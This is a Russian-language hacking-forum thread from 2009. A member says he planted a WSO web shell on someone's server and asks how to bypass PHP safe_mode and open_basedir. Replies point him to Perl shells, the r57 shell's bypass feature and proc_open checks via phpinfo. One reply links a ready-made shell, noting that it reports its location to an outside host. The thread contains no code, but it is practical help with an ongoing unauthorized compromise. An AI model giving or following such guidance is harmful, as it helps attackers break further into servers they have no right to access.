Обход Safe mod+Open basedir

Discussion in 'Песочница' started by LordNikon, 9 Dec 2009.

  1. LordNikon

    LordNikon New Member

    Joined:
    2 Apr 2007
    Messages:
    16
    Likes Received:
    2
    Reputations:
    0
    Привет ачатовцы!
    Проблема такая залил шелл (WSO), но на серваке safe_mod=on, open_basedir=on. То есть никакие команды я выполнить не могу, и листинг диры где я тоже не могу сделать.
    Я поискал, но ничего толкового не нашел.
    Может кто знает как обойти эти 2 опции?

    Если эта тема чем то не подходит по правилам, модеры хоть отпишите в личку за что?
     
  2. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Есть возможность, зависит от версии PHP.
    Но для начала попробуй PERL - шелл како-нибудь, может помочь. + в r57 от Elekt'a есть возможносьб обхода safe_mode и basedir
     
  3. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Экстрасенсы в отпуске. Версию пыха, ось и список запрешенных команд.
     
  4. LordNikon

    LordNikon New Member

    Joined:
    2 Apr 2007
    Messages:
    16
    Likes Received:
    2
    Reputations:
    0
    PHP 5.2.6.
    CentOS
    Linux 2.6.18-128.1.10
    А с перловым и r57 я попробую, спасибо.

    Команды все, какую не введу ни одна не проходит...
     
  5. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Список отключенных команд можно взять из phpinfo.
    Если proc_open там не виднеется, то попробуй - https://forum.antichat.ru/thread114500.html
     
    #5 BlackSun, 10 Dec 2009
    Last edited: 10 Dec 2009
  6. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    http://forum.antichat.ru/showthread.php?t=37928
     
  7. overxor

    overxor Member

    Joined:
    11 Sep 2009
    Messages:
    32
    Likes Received:
    9
    Reputations:
    0
    Попробуй этот шел.
    http://stashbox.org/823273/4e.txt
    У меня обход safe mod'a сработал.
    Только имей ввиду, что он отсылает данные на http://fx0.name/spec/index.php/pic.png?a=http://host/your_shell.php
    Так что используй на свой страх и риск.